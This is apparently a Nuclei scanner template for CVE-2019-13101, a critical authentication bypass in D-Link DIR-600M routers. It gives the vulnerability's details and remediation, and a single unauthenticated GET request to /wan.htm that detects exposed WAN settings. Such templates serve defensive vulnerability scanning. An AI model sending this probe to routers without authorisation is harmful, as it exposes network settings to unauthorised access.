id: CVE-2019-13101 info: name: D-Link DIR-600M - Authentication Bypass author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. impact: | An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. remediation: | Update the router's firmware to the latest version provided by D-Link. reference: - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://us.dlink.com/en/security-advisory - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.0359 epss-percentile: 0.90708 cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-600m_firmware tags: cve2019,cve,packetstorm,edb,dlink,router,iot http: - raw: - | GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} matchers-condition: and matchers: - type: word part: body words: - "/PPPoE/" - type: status status: - 200 # digest: 4b0a00483046022100af3cf81676c3a2a1bc2df5fd9a8f165442b9cab1f612b9824a7f1340c0ee49dd022100e14684c8fb70ae052c5b46650e2f320a016f6b34fc784daa1ed3a020a08c3d40:922c64590222798bb761d5b6d8e72950